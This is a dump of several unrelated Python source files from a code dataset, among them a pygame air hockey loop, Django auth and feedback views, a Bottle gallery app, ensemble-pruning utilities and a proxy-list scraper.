paddle2.checkRightBoundary(width)\r\n\r\n # Update Puck\r\n puck.x += puck.velocity[0]\r\n puck.y += puck.velocity[1]\r\n if puck.x + puck.radius < 0:\r\n score2 += 1\r\n puck.serveDirection = -1\r\n puck.reset()\r\n elif puck.x - puck.radius > width:\r\n score1 += 1\r\n puck.serveDirection = 1\r\n puck.reset()\r\n if puck.collidesTopBottom(height):\r\n puck.velocity[1] *= -1\r\n if puck.collidesLeftRight(width):\r\n if(puck.y<((height / 2) - 90) or puck.y>((height / 2) + 90) ):\r\n print (\"true\")\r\n puck.velocity[0] *= -1\r\n\r\n\r\n if puck.collidesWithPaddle(paddle1):\r\n puck.x = paddle1.x + paddle1.radius + puck.radius\r\n puck.velocity[0] *= -1\r\n if puck.collidesWithPaddle(paddle2):\r\n puck.x = paddle2.x - paddle2.radius - puck.radius\r\n puck.velocity[0] *= -1\r\n\r\n # playing area should be drawn first\r\n renderPlayingArea()\r\n\r\n # drawing the paddle and the puck\r\n paddle1.draw(screen, (255, 0, 0))\r\n paddle2.draw(screen, (255, 255, 0))\r\n puck.draw(screen)\r\n score(score1,score2)\r\n\r\n pygame.display.flip()\r\n clock.tick(60)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n choice = airHockeyStart(screen, clock, width, height)\r\n if choice == 1:\r\n gameLoop(7)\r\n elif choice == 2:\r\n gameLoop(12)\r\n elif choice == 0:\r\n sys.exit()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"207494229","text":"n = int(input())\nwl = []\nwl.append(input())\nans = 'Yes'\nfor _ in range(1,n):\n w = input()\n if w in wl or wl[-1][-1] != w[0] or ans == 'No':\n ans = 'No'\n else:\n wl.append(w)\nprint(ans)","sub_path":"abc_py/abc109/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"279743779","text":"from django.core.context_processors import csrf\nfrom django.template import RequestContext\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponseRedirect,HttpResponse\nfrom django.contrib import auth\nfrom CRP.crp.forms import *\nfrom CRP.crp.models import *\nfrom CRP import common\nimport logging\nimport random\nimport datetime\n\nlog = logging.getLogger(\"crp.views\")\n\ndef crp_404_view(request):\n data = {}\n return render_to_response('404.html',data,context_instance=RequestContext(request))\n\ndef crp_error_view(request):\n data = {}\n return render_to_response('500.html',data,context_instance=RequestContext(request))\n\ndef process_sign_out(request):\n \"\"\"\n This function is used to logout user successfully from the site.\n \"\"\"\n user=request.user\n auth.logout(request)\n try:\n request.session.flush()\n except:\n pass\n data = {}\n return render_to_response('home.html',data,context_instance=RequestContext(request))\n\ndef home(request):\n \"\"\"\n This function displays some information about bhagirath project, \n weekly and overall top users and provides login facility to the user. 
\n \"\"\"\n data = {}\n return render_to_response('home.html',data,context_instance=RequestContext(request))\n\ndef sort(request):\n site_user = request.user\n #Data access\n count = User.objects.filter(username=site_user).count()\n if count!=0:\n option1 = 'molly1'\n option2 = 'polly2'\n option3 = 'colly3'\n option4 = 'folly4'\n option5 = 'dolly5'\n form = SortForm()\n initialData = {'username':site_user,\n 'form': form,\n 'option1':option1,\n 'option2':option2,\n 'option3':option3,\n 'option4':option4,\n 'option5':option5,}\n csrfContext = RequestContext(request, initialData)\n return render_to_response('sort.html',csrfContext)\n else:\n data = {'form': LoginForm(),}\n return render_to_response('sign_in.html',data,context_instance=RequestContext(request))\n \ndef process_sort(request):\n user = request.user\n if user.is_authenticated():\n order = request.POST['sortlist']\n next = \"/sort/\"\n return HttpResponseRedirect(next) \n \n \ndef compare(request):\n is_present = False\n data = {'form':CompareForm(),'is_present':is_present}\n return render_to_response('compare.html',data,context_instance=RequestContext(request))\n \ndef process_compare(request):\n list_word_1 = request.POST.pop('word_1')\n word_1 = ''.join(list_word_1)\n list_word_2 = request.POST.pop('word_2')\n word_2 = ''.join(list_word_2)\n c = Compare()\n c.word_1 = word_1\n c.word_2 = word_2\n #similarity calculation\n c.similarity_score = 0\n score = 0\n is_present = True\n c.save()\n data = {'word_1':word_1, 'word_2':word_2, 'score':score, 'is_present':is_present}\n next = \"/compare/\"\n return render_to_response('compare.html',data,context_instance=RequestContext(request))\n\ndef contact_us(request):\n user = request.user\n logged_in = False\n email_id = \"\"\n form = ContactUsForm()\n data = {'email_id':email_id,'username':user, 'logged_in':logged_in,'form':form }\n return render_to_response('contact_us.html',data,context_instance=RequestContext(request))\n\ndef process_contact_us(request):\n c = request.POST.pop('comment')\n e = request.POST.pop('email')\n try:\n a = Feedback()\n if request.POST.has_key('feedback_suggestion'):\n a.type = \"suggestion\"\n if c[0] and e[0]:\n a.comment = c[0]\n a.email = e[0]\n a.save()\n else:\n log.error(\"All fields not entered correctly while user feedback.\")\n \n elif request.POST.has_key('feedback_collaboration'):\n a.type = \"collaboration\"\n if c[1] and e[1]:\n a.comment = c[1]\n a.email = e[1]\n a.save()\n else:\n log.error(\"All fields not entered correctly while user feedback.\")\n \n elif request.POST.has_key('feedback_copyright_issues'):\n a.type = \"copyright_issue\"\n if c[2] and e[2]:\n a.comment = c[2]\n a.email = e[2]\n a.save()\n else:\n log.error(\"All fields not entered correctly while user feedback.\")\n except:\n log.exception(\"Save user feedback failed for %s.\"%(request.POST['email']))\n next = \"/contact_us/\"\n return HttpResponseRedirect(next) \n\n\ndef sign_up(request):\n \"\"\"\n This function loads sign up form for new user's registration. \n \"\"\"\n data = { 'form': SignUpForm() }\n return render_to_response('sign_up.html',data,context_instance=RequestContext(request))\n \ndef process_sign_up(request):\n \"\"\"\nThis function is used to process information provided by user while registration.\nIt performs several checks over the data entered by user like the entered recaptcha,\npassword as well as confirmed password, unique username and email-id. 
If all entries\nare valid and all checks pass, it registers the user by creating records in the User and User_Profile models.\n\"\"\"\n user = request.user\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n f_username = form.cleaned_data['username']\n f_password = form.cleaned_data['password']\n f_email = form.cleaned_data['email']\n \n try:\n count = 0\n #Check for unique email-id\n count = User.objects.filter(email=f_email).count()\n if count !=0:\n data = {'form': SignUpForm(request.POST)}\n log.error(\"Existing email-id used while user-registration.\")\n return render_to_response('sign_up.html',data,context_instance=RequestContext(request))\n \n #Check for unique username\n count = User.objects.all().filter(username = f_username).count()\n if count != 0:\n data = {'form': SignUpForm(request.POST)}\n log.error(\"Existing username used while user-registration.\")\n return render_to_response('sign_up.html',data,context_instance=RequestContext(request))\n \n u = User.objects.create_user(f_username, f_email, f_password)\n u.is_active = True\n u.set_password(f_password)\n u.save()\n user = User.objects.get(username__exact=f_username)\n p = User_Profile()\n p.user = user\n p.user_creation_timestamp = datetime.datetime.now()\n p.date_of_birth = datetime.datetime.now()\n p.state_province = 'Maharashtra'\n try:\n p.ip_address = request.META['HTTP_X_FORWARDED_FOR']\n except:\n p.ip_address = request.META['REMOTE_ADDR']\n p.save()\n next = \"/sign_in/\"\n return HttpResponseRedirect(next) \n except:\n data = {'form': SignUpForm()}\n log.exception(\"User registration failed for %s.\"%(f_username))\n return render_to_response('sign_up.html',data,context_instance=RequestContext(request))\n else:\n data = {'form': SignUpForm(request.POST)}\n log.error(\"All fields not entered correctly while user registration.\")\n return render_to_response('sign_up.html',data,context_instance=RequestContext(request))\n \ndef sign_in(request):\n \"\"\"\n This function loads the sign in form for user login. 
\n \"\"\"\n data = {'form': LoginForm(),}\n return render_to_response('sign_in.html',data,context_instance=RequestContext(request))\n\ndef process_sign_in(request):\n \"\"\"\n This function authenticates the user with username and password provided \n by him and allows login if and only if the user is active.\n \"\"\"\n uname = request.POST['username']\n passwd = request.POST['password']\n user = auth.authenticate(username=uname, password=passwd)\n if user is not None and user.is_active:\n auth.login(request, user)\n next = \"/sort/\"\n return HttpResponseRedirect(next) \n else:\n log.error(\"Login failed for user: %s.\"%(uname))\n data = {'form': LoginForm(),}\n return render_to_response('sign_in.html',data,context_instance=RequestContext(request))\n","sub_path":"CRP/crp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"627861211","text":"from bottle import Bottle, request\n\nfrom datafly.core import template\nfrom datafly.utils.editor import slugify\n\nfrom config import db\n\n# PUBLIC\n\npublic_app = Bottle()\n\n@public_app.get('/gallery/')\ndef view_gallery(id): \n gallery = db.galleries.find_one({ 'id': id })\n return template('gallery.html', gallery=gallery)\n\n# ADMIN\n\nadmin_app = Bottle()\n\n@admin_app.get('/admin/gallery/')\ndef manage_gallery(id):\n template_context = dict(\n gallery = db.galleries.find_one({ 'id': id }),\n id=id,\n size=admin_app.config['size']\n )\n return template('admin/gallery.html', **template_context) \n\n@admin_app.post('/admin/api/gallery')\ndef save_gallery():\n data = request.json['data']\n data['id'] = slugify(data['title']) if data['id'] == 'new' else data['id']\n db.galleries.update({ 'id': data['id'] }, data, upsert=True)\n return { 'id': data['id'] } ","sub_path":"www/datafly/views/gallery.py","file_name":"gallery.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"252573082","text":"import random \r\n\r\nnofchoices = input(\"Enter amount of choices.\\n\")\r\n\r\nchoices = []\r\nfor i in range(0,int(nofchoices)):\r\n c = input(f'Choice {i+1} is ')\r\n\r\n choices.append(c)\r\n\r\nprint(random.choice(choices))","sub_path":"chooseforme.py","file_name":"chooseforme.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"16408096","text":"#!/usr/bin/env python\nimport sys\nsys.path.append('../../py')\n\nfrom pylab import *\nfrom gsim import *\n\ndata, desc = gs('451_circ.sch')\n\nvname = desc['varnames']\nvunit = desc['varunits']\n\nt = data['time']*1e3\nvout = data['v(out)']\n\nplot(t,vout, 'r', label='DT')\nxlabel('Time [ms]')\nylabel('Voltage [V]')\nxlim(0, t[-1])\ngrid()\nsavefig('451_img.png')\n#show()\n\n","sub_path":"demo-ngspice/450_spice_signal/451_prg.py","file_name":"451_prg.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"78070588","text":"#!virtual_env/bin/python3\n\n# **************************************************************************** #\n# #\n# ::: :::::::: #\n# logreg_predict.py :+: :+: :+: #\n# +:+ +:+ +:+ #\n# By: eduriez +#+ +:+ +#+ #\n# +#+#+#+#+#+ +#+ #\n# Created: 2020/08/06 17:50:06 by eduriez #+# #+# #\n# Updated: 2020/08/06 17:50:06 by eduriez ### ########.fr #\n# #\n# 
**************************************************************************** #\n\nimport pandas as pd\nimport sys\nfrom DSLR_maths.logistic_regression import test_model\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print(\"Usage : ./logreg_predict.py datasets/dataset_test.csv datasets/weights.csv \", file=sys.stderr)\n else:\n try:\n columns_dataset = [\n \"Astronomy\",\n \"Muggle Studies\",\n \"Ancient Runes\",\n \"Transfiguration\",\n \"Flying\"\n ]\n dataset_test = pd.read_csv(sys.argv[1])[columns_dataset]\n weights = pd.read_csv(sys.argv[2])\n predicts = test_model(dataset_test, columns_dataset, weights)\n predicts.to_csv(\"datasets/houses.csv\", index=False)\n except Exception as e:\n print(e, file=sys.stderr)\n","sub_path":"Algorithmic_branch/DSLR/logreg_predict.py","file_name":"logreg_predict.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"537751085","text":"#Hannah Lerner\n#hlerner@bu.edu\n\nfrom ps4pr1 import *\n\n\n#1\n\ndef add(s1,s2):\n '''adds the two binary numbers by converting them to base 10 for the math then converting back'''\n x = bin_to_dec(s1)\n y = bin_to_dec(s2)\n z = dec_to_bin(x+y)\n return z\n\n#2\n\ndef add_bitwise(s1,s2):\n ''' recursively adds the two binary numbers together'''\n if s1 == '' and s2 == '':\n return ''\n elif s1 == '':\n return s2\n elif s2 == '':\n return s1\n else:\n rest = add_bitwise(s1[:-1],s2[:-1])\n if s1[-1] == '1' and s2[-1] == '1':\n return add_bitwise(rest,'1') + '0'\n if s1[-1] == '0' and s2[-1] == '1':\n return rest + '1'\n if s1[-1] == '1' and s2[-1] == '0':\n return rest + '1'\n if s1[-1] == '0' and s2[-1] == '0':\n return rest + '0'\n","sub_path":"ps4pr2.py","file_name":"ps4pr2.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"104189599","text":"\"\"\"\n Exercise 1:\n Add a generic sum method to list_helper.py.\n Case 1: compute the total HP of all enemies in the enemy list.\n Case 2: compute the total attack of all enemies in the enemy list.\n Case 3: compute the total defense of all enemies in the enemy list.\n Steps:\n implement the concrete feature / extract what varies / extract what stays the same / combine\n\n Exercise 2:\n Add a generic projection (select) method to list_helper.py.\n Case 1: get the names of all enemies in the enemy list.\n Case 2: get the attack of all enemies in the enemy list.\n Case 3: get the name and HP of all enemies in the enemy list.\n\n Exercise 3:\n Add a generic get-max method to list_helper.py.\n Case 1: get the enemy with the highest attack in the enemy list.\n Case 2: get the enemy with the highest defense in the enemy list.\n Case 3: get the enemy with the highest HP in the enemy list.\n\n Exercise 4:\n Add a generic ascending-sort method to list_helper.py.\n Case 1: sort the enemy list by attack in ascending order.\n Case 2: sort the enemy list by defense in ascending order.\n Case 3: sort the enemy list by HP in ascending order.\n\"\"\"\nfrom common.list_helper import *\n\n\nclass Enemy:\n def __init__(self, name, hp, atk, defense):\n self.name = name\n self.hp = hp\n self.atk = atk\n self.defense = defense\n\n def __str__(self):\n return \"%s--%d--%d--%d\" % (self.name, self.hp, self.atk, self.defense)\n\n\nlist01 = [\n Enemy(\"玄冥二老\", 86, 120, 58),\n Enemy(\"成昆\", 0, 100, 5),\n Enemy(\"谢逊\", 120, 130, 60),\n Enemy(\"灭霸\", 0, 1309, 690),\n]\n\n# Exercise 1:\n\"\"\"\n# implement the concrete feature......\ndef sum01():\n sum_value = 0\n for item in list01:\n sum_value += item.atk\n return sum_value\n\ndef sum02():\n sum_value = 0\n for item in list01:\n sum_value += item.hp\n return sum_value\n\ndef sum03():\n sum_value = 0\n for item in list01:\n sum_value += item.defense\n return sum_value\n\n# extract what varies.....\ndef handle01(item):\n return item.atk\n\ndef handle02(item):\n return item.hp\n\ndef handle03(item):\n return item.defense\n\n# extract what stays the same....\ndef sum(func_handle):\n sum_value = 0\n for item in list01:\n # sum_value += item.defense\n # sum_value += handle03(item)\n sum_value += func_handle(item)\n return sum_value
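\n\n# (added note, not in the original) sum(handle03) walks list01 once and lets the\n# passed-in handle choose which field to accumulate -- the \"extract what varies\"\n# step described in the module docstring.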
\n\nprint(sum(handle03))\n\"\"\"\nprint(ListHelper.sum(list01, lambda item: item.atk))\n\n# Exercise 2:\n\"\"\"\ndef select01():\n result = []\n for item in list01:\n result.append(item.name)\n return result\n\ndef select02():\n result = []\n for item in list01:\n result.append(item.atk)\n return result\n\ndef select03():\n result = []\n for item in list01:\n result.append((item.name,item.hp))\n return result\n\ndef handle01(item):\n return item.name\n\ndef handle02(item):\n return item.atk\n\ndef handle03(item):\n return (item.name,item.hp)\n\n# def select(func_handle):\n# result = []\n# for item in list01:\n# # result.append((item.name,item.hp))\n# # result.append(handle03(item))\n# result.append(func_handle(item))\n# return result\n\ndef select(func_handle):\n for item in list01:\n yield func_handle(item)\n\nfor item in select(handle01):\n print(item)\n\"\"\"\nfor item in ListHelper.select(list01, lambda item: (item.name, item.hp)):\n print(item)\n\n# Exercise 3:\n\"\"\"\ndef get_max01():\n max_value = list01[0]\n for i in range(1, len(list01)):\n if max_value.atk < list01[i].atk:\n max_value = list01[i]\n return max_value\n\n\ndef get_max02():\n max_value = list01[0]\n for i in range(1, len(list01)):\n if max_value.defense < list01[i].defense:\n max_value = list01[i]\n return max_value\n\n\ndef get_max03():\n max_value = list01[0]\n for i in range(1, len(list01)):\n if max_value.hp < list01[i].hp:\n max_value = list01[i]\n return max_value\n\n\ndef handle01(item):\n return item.atk\n\n\ndef handle02(item):\n return item.defense\n\n\ndef handle03(item):\n return item.hp\n\n\ndef get_max(func_handle):\n max_value = list01[0]\n for i in range(1, len(list01)):\n # if max_value.hp < list01[i].hp:\n # if handle03(max_value) < handle03(list01[i]):\n if func_handle(max_value) < func_handle(list01[i]):\n max_value = list01[i]\n return max_value\n\nprint(get_max(handle02))\n\"\"\"\nprint(ListHelper.get_max(list01, lambda item: item.atk))\n\n# Exercise 4:\n\"\"\"\ndef order_by01():\n # take each leading element in turn\n for r in range(len(list01) - 1):\n # compare it with the elements after it\n for c in range(r + 1, len(list01)):\n if list01[r].atk > list01[c].atk:\n list01[r], list01[c] = list01[c], list01[r]\n\ndef order_by02():\n for r in range(len(list01) - 1):\n for c in range(r + 1, len(list01)):\n if list01[r].defense > list01[c].defense:\n list01[r], list01[c] = list01[c], list01[r]\n\ndef order_by03():\n for r in range(len(list01) - 1):\n for c in range(r + 1, len(list01)):\n if list01[r].hp > list01[c].hp:\n list01[r], list01[c] = list01[c], list01[r]\n\ndef handle01(item):\n return item.hp\ndef handle02(item):\n return item.defense\ndef handle03(item):\n return item.atk\n\ndef order_by(func_handle):\n for r in range(len(list01) - 1):\n for c in range(r + 1, len(list01)):\n # if list01[r].hp > list01[c].hp:\n # if handle03(list01[r]) > handle03(list01[c]):\n if func_handle(list01[r]) > func_handle(list01[c]):\n list01[r], list01[c] = list01[c], list01[r]\n\norder_by(handle01)\n\nfor item in list01:\n print(item)\n\"\"\"\nListHelper.order_by(list01, lambda item: item.hp)\nfor item in list01:\n print(item)\n# 15:20\n","sub_path":"python_one_learn/day18/exercise02.py","file_name":"exercise02.py","file_ext":"py","file_size_in_byte":5669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"512511580","text":"import numpy as np\nfrom Script.metrics.evaluation import _recall, _gm, _sar, _auc\nfrom sklearn.metrics import cohen_kappa_score\nimport warnings\nimport inspect\n\n\ndef name_and_args():\n
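# (added comment, not in the original) inspect the caller's frame to report its\n # argument names and current values -- a small debugging helper.\n caller = 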
inspect.stack()[1][0]\n args, _, _, values = inspect.getargvalues(caller)\n return [(i, values[i]) for i in args]\n\n\ndef direct_select(true_y, select, candidates, votes, clsWeight, cnt_votes, prob, func):\n \"\"\"Description\n Parameter\n ---------------------------------------------------------------\n candidates: indices of all remaining classifiers\n select: indices of selected classifiers in current ensemble\n votes: 2d-array with rows representing each instance, columns representing each classifier [-x,x]\n cnt_votes: 2d np array of shape [N, 2] recording total weights for majority/minority classes\\\n clsWeight: 1d-array indicating weight of each classifiers (M, )\n prob: whether calculation is based on probability or actual vote\n ===============================================================\n update_vote returns weighted votes after adding a weighted classifier (dynamic programming)\n in current version, we haven't included balance feature into the design of direct search as \n well as kappa diversity search. \n \"\"\"\n def getensemblevote(array):\n # array is 1d np of shape N_instance, each is a weighted vote of candidate classifier\n # return 2d array of shape [N, 2] representing neg weight, pos weight \n cnt = cnt_votes.copy()\n neg_filter = array <= 0; pos_filter = ~neg_filter\n cnt[neg_filter, 0] += -array[neg_filter]\n cnt[pos_filter, 1] += array[pos_filter]\n return cnt\n def get_score(array):\n return func(true_y, array)\n # ------------------------------------------------------------------------ #\n res = np.array(list(map(getensemblevote, votes[:, candidates].T)))\n update_vote, pred_prob = res[:,:,:2], res[:,:,1]/res[:,:,:2].sum(axis=2)\n if not prob:\n pred_prob = (pred_prob > 0.5).astype(int)\n scores = np.array(list(map(get_score, pred_prob)))\n best = scores.argmax()\n candidate, cnt_vote, score = candidates[best], update_vote[best], scores[best]\n return candidate, cnt_vote, clsWeight, score \n\ndef select_candidate_by_kappa(**args):\n \"\"\"Description\n kappa measures agreement beyond chance: kappa = (p_o - p_e) / (1 - p_e),\n where p_o is the observed agreement and p_e the agreement expected from\n mere guessing (Cohen, 1960). kappa ranges from -1 to +1; 1 means perfect\n agreement with no chance component, whereas values <= 0 indicate no\n agreement beyond chance.\n \"\"\"\n args.update({'prob': False, 'func': cohen_kappa_score})\n return direct_select(**args)\n\ndef select_candidate_by_sar(**args):\n args.update({'func': _sar})\n return direct_select(**args)\n\ndef select_candidate_by_gm(**args):\n args.update({'func': _gm})\n return direct_select(**args)\n\ndef select_candidate_by_recall(**args):\n args.update({'func': _recall})\n return direct_select(**args)\n\ndef select_candidate_by_auc(**args):\n args.update({'func': _auc})\n return direct_select(**args)\n\n\ndef get_probability(matrix, enforcer=0.0):\n \"\"\"calculate total votes for +1 and -1 then calculate proportion\n Parameter\n ---\n array is an array of -x and +x if vote is false\n \"\"\"\n def helper(array):\n abSum = np.abs(array).sum()+enforcer\n return sum(array[array>0])/abSum\n return np.array(list(map(helper, matrix)))\n\n\n# def get_probability_by_count(matrix, enforcer=0.0):\n# \"\"\"matrix of zero-one\"\"\"\n# def helper(array):\n# pos = sum(array==1)\n# return pos/(len(array)+)\n# if len(count) == 1:\n# return 0.0\n# else:\n# return count[1] / (count[0] + count[1])\n# return np.array(list(map(helper, matrix)))\n\n# def select_candidate_by_cap(true_y, select, candidates, votes, Kmm, Kcm):\n# \"\"\"Description\n# CAP score too time consuming, 
# def get_probability_by_count(matrix, enforcer=0.0):\n# \"\"\"matrix of zero-one\"\"\"\n# def helper(array):\n# pos = sum(array==1)\n# return pos/(len(array)+)\n# if len(count) == 1:\n# return 0.0\n# else:\n# return count[1] / (count[0] + count[1])\n# return np.array(list(map(helper, matrix)))\n\n# def select_candidate_by_cap(true_y, select, candidates, votes, Kmm, Kcm):\n# \"\"\"Description\n# CAP score too time consuming, abandon this method\n# \"\"\"\n# Ns = len(select)\n# res = []\n# for candidate in candidates:\n\n# # 1) create temporary memory of following important variables\n# _selects = votes[:, select]\n# _candidate = votes[:, candidate]\n\n# # 2) dynamic programming: update Kmm and Kcm accordingly\n# if Ns == 1: # the 2nd round when ensemble includes one classifier only\n# Kmm = cohen_kappa_score(_selects, _candidate)\n# Kcm = (cohen_kappa_score(_selects, true_y) +\n# cohen_kappa_score(_candidate, true_y)) / 2\n# else: # update m-m and c-m scores dynamically\n# Kmm = (Kmm * Ns + sum(map(lambda x: cohen_kappa_score(x,\n# _candidate), _selects.T))) / (Ns + 1)\n# Kcm = (Kcm * Ns + cohen_kappa_score(_candidate, true_y)) / (Ns + 1)\n\n# # 3) calculate merit score for this candidate\n# merits = Ns * Kcm / np.sqrt(Ns + Ns * (Ns - 1) * Kmm)\n# res.append(merits)\n# return candidates[np.array(res).argmax()], Kmm, Kcm\n\n\ndef heuristic_select(true_y, select, candidates, votes, clsWeight, insWeight, balance, heuristic, enforcer):\n \"\"\"Description\n Parameter\n ---------------------------------------------------------------\n insWeight: (N, ) shape array\n clsWeight: (M, ) in the current version classifier weight doesn't play a role in the boosting algorithm !!\n ===============================================================\n Return\n ---------------------------------------------------------------\n best candidate and new updated instance weight, possibly new classifier weight (update in the future)\n ===============================================================\n Special Notification\n ---------------------------------------------------------------\n For boosting based pruning: classifier weight doesn't make any difference in selection\n \"\"\"\n def get_weighted_score(array):\n # array := candidate weighted vote on all instances\n if heuristic == 'boost':\n return sum(-weight * ((array>0).astype(int) != true_y)) \n else:\n return sum(weight * (2 * ((array>0).astype(int) == true_y) - 1))\n #---------------------------------------------------------------------------#\n # Boosting based pruning #\n def update_by_boost(select_candidate, _insWeight):\n correct_filter = (votes[:, select_candidate] > 0.5).astype(int) == true_y\n incorrect_filter = ~correct_filter\n error = incorrect_filter.sum()/N # fraction of misclassified instances (len() would always equal N)\n if error > 0.5:\n _insWeight = np.array([1 / N] * N)\n else:\n if error == 0.0: error = 0.01 # avoid inf weight\n if error == 1.0: error = 0.99 # avoid 0.0 weight\n _insWeight[correct_filter] /= (2 * (1 - error))\n _insWeight[incorrect_filter] /= (2 * error)\n return normal(_insWeight)\n #---------------------------------------------------------------------------#\n # Uncertainty Weighted Accuracy based pruning #\n def update_by_uwa(select_candidate, _insWeight):\n pred_prob = get_probability(votes[:, select + [select_candidate]])\n return normal(np.minimum(pred_prob, 1 - pred_prob))\n #---------------------------------------------------------------------------#\n # Difficulty Weighted Accuracy based pruning #\n def update_by_dwa(select_candidate, _insWeight):\n pred_prob = get_probability(votes[:, select + [select_candidate]])\n correct = true_y == (pred_prob > 0.5).astype(int)\n pred_prob[correct] = np.minimum(pred_prob[correct], 1 - pred_prob[correct])\n pred_prob[~correct] = np.maximum(pred_prob[~correct], 1 - pred_prob[~correct])\n return normal(pred_prob)\n #---------------------------------------------------------------------------#\n
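    # Illustrative note for the udwa/udwa_enf helpers below: Python's `&`
    # binds tighter than `==`, so `a == b & c` parses as `a == (b & c)`.
    # The intended "correctly classified AND minority class" mask therefore
    # needs explicit parentheses:
    #   flag = (true_y == (pred_prob > 0.5).astype(int)) & (true_y == 1)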
 # Uncertainty & Difficulty Weighted Accuracy based pruning #\n def update_by_udwa(select_candidate, _insWeight):\n pred_prob = get_probability(votes[:, select + [select_candidate]])\n # ----- weighted by difficulty when instance is minority class -------- #\n flag = (true_y == (pred_prob > 0.5).astype(int)) & (true_y == 1)\n pred_prob[~flag] = np.minimum(pred_prob[~flag], 1 - pred_prob[~flag])\n pred_prob[flag] = np.maximum(pred_prob[flag], 1 - pred_prob[flag])\n return normal(pred_prob)\n #---------------------------------------------------------------------------#\n # Uncertainty & Difficulty Weighted Accuracy based pruning + System Bias#\n def update_by_udwa_enf(select_candidate, _insWeight):\n pred_prob = get_probability(votes[:, select + [select_candidate]],enforcer)\n # ----- weighted by difficulty when instance is minority class -------- #\n flag = (true_y == (pred_prob > 0.5).astype(int)) & (true_y == 1)\n pred_prob[~flag] = np.minimum(pred_prob[~flag], 1 - pred_prob[~flag])\n pred_prob[flag] = np.maximum(pred_prob[flag], 1 - pred_prob[flag])\n return normal(pred_prob)\n #############################################################################\n # 1) update instance weight \n N = len(true_y) # how many instances in total\n candidate = select[-1] # added classifier in the last round\n insWeight = eval('update_by_' + heuristic + '(candidate, insWeight)')\n # 2) to balance the importance of majority/minority bias\n #############################################################################\n if balance:\n tmpWeight = insWeight.copy()\n major = true_y == 0; minor = ~major\n tmpWeight[major] = normal(tmpWeight[major])/2\n tmpWeight[minor] = normal(tmpWeight[minor])/2\n weight = tmpWeight if balance else insWeight\n #############################################################################\n # 3) select best candidate classifier\n scores = np.array(list(map(get_weighted_score, votes[:, candidates].T)))\n best = scores.argmax()\n candidate, score = candidates[best], scores[best]\n #############################################################################\n return candidates[best], insWeight, clsWeight\n\n\n\ndef normal(array):\n Sum = sum(array)\n if Sum == 0:\n return np.zeros(len(array))\n else:\n return array / Sum","sub_path":"Script/pruning/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"622054716","text":"from django.db import models\n\nTIPO_ACTIVIDAD = (\n ('R', 'Rutinaria'),\n ('NR', 'No Rutinaria'),\n ('PALT', 'Personal con Acceso al Lugar de Trabajo')\n)\n\n\nclass TipoActividad(models.Model):\n descripcion = models.CharField(max_length=100, db_index=True, choices=TIPO_ACTIVIDAD)\n\n class Meta:\n verbose_name = 'TipoActividad'\n verbose_name_plural = 'TipoActividads'\n\n def __str__(self):\n return self.get_descripcion_display()\n","sub_path":"tipo_actividad/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
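The pickleRelod.py record that follows only shows the load side of the round trip; a minimal companion sketch of the write side, assuming the same a.pkl file name and Bird class (this writer script is inferred, not part of the original dataset):

import pickle

class Bird(object):
    have_feather = True
    way_of_reproduction = 'egg'

# persist an instance so that pickleRelod.py can load it back;
# pickle files are written and read in binary mode
summer = Bird()
with open('a.pkl', 'wb') as f:
    pickle.dump(summer, f)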
+{"seq_id":"432870153","text":"#!/usr/bin/env python\n\nimport pickle\n\n# define the class before unpickling\nclass Bird(object):\n have_feather = True\n way_of_reproduction = 'egg'\n\nfn = 'a.pkl'\nwith open(fn, 'rb') as f:\n summer = pickle.load(f)\t# rebuild the stored object under a new name\n","sub_path":"pickleRelod.py","file_name":"pickleRelod.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"481105175","text":"import logging\nfrom enum import Enum\nfrom async_web_scrapper import GenericPage, PageResult\nfrom async_web_scrapper.proxy.proxy_types import *\n\n\nclass PageEnum(Enum):\n SOCKS = 0\n HTTPS = 1\n ANON = 2\n UK = 3\n US = 4\n\n\nclass _ProxyPage:\n async def parse_entries(self):\n html = await self.retriever.retrieve_html(self.url, failsafe=True)\n return map(\n lambda x: list(map(lambda y: y.text.strip(), x.find_all('td'))), \n html.find('table').find('tbody').find_all('tr')\n )\n\n\nclass SOCKSPage(GenericPage, _ProxyPage):\n async def process(self):\n logging.info('Parsing page with SOCKS proxies')\n entries = await self.parse_entries()\n return PageResult(\n items=list(map(lambda x: SOCKS4Proxy(*x[:3]) if x[4].lower() == 'socks4' else SOCKS5Proxy(*x[:3]), entries))\n )\n\n\nclass HTTPSPage(GenericPage, _ProxyPage):\n async def process(self):\n logging.info('Parsing page with HTTPS proxies')\n entries = await self.parse_entries()\n return PageResult(\n items=list(map(lambda x: HTTPSProxy(*x[:3]), entries))\n )\n\n\nclass AnonPage(GenericPage, _ProxyPage):\n async def process(self):\n logging.info('Parsing page with anonymous proxies')\n entries = await self.parse_entries()\n return 